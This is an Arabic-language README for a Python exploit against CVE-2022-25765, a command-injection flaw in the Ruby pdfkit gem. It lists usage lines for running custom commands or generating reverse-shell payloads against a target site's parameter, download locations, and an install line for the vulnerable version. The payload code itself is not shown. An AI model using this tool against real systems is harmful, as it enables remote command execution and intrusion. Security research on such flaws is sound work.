
استغلال لثغرة CVE-2022–25765 (pdfkit) - حقن أوامر

أعجبك هذا المستودع؟ امنحنا ⭐!
لأغراض تعليمية وأبحاث أمنية مصرّح بها فقط.
@UNICORDev بواسطة (@NicPWNs و @Dev-Yeoj)
حزمة pdfkit بدءًا من الإصدار 0.0.0 معرّضة لحقن أوامر (Command Injection) حيث لا يتم تنقية الرابط (URL) بشكل صحيح.
تُستخدم جوهرة ruby pdfkit بشكل شائع لتحويل المواقع أو HTML إلى مستندات PDF. يمكن تمرير رابط مُعدّ خصيصًا يحتوي على أمر سيتم تنفيذه إلى الإصدارات المعرّضة للخطر (< 0.8.7.2) من هذا البرنامج. ينشئ هذا الاستغلال روابط قابلة للتنفيذ أو يرسلها إلى موقع ويب معرّض يعمل بـ pdfkit.
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c وضع الأمر المخصص. حدد أمرًا لإنشاء حمولة مخصصة به.
-s وضع الصدفة العكسية. حدد IP المحلي والمنفذ لإنشاء حمولة صدفة عكسية به.
-w رابط الموقع الذي يعمل بـ pdfkit المعرّض للخطر. (اختياري)
-p معامل POST على الموقع الذي يعمل بـ pdfkit المعرّض للخطر. (اختياري)
-h إظهار قائمة المساعدة هذه.
تحميل exploit-CVE-2022-25765.py من GitHub
تحميل exploit-CVE-2022-25765.py من ExploitDB
searchsploit -u
searchsploit -m 51293


pdfkit الإصدار 0.8.6
إصدارات pdfkit < 0.8.7.2
gem install pdfkit -v 0.8.6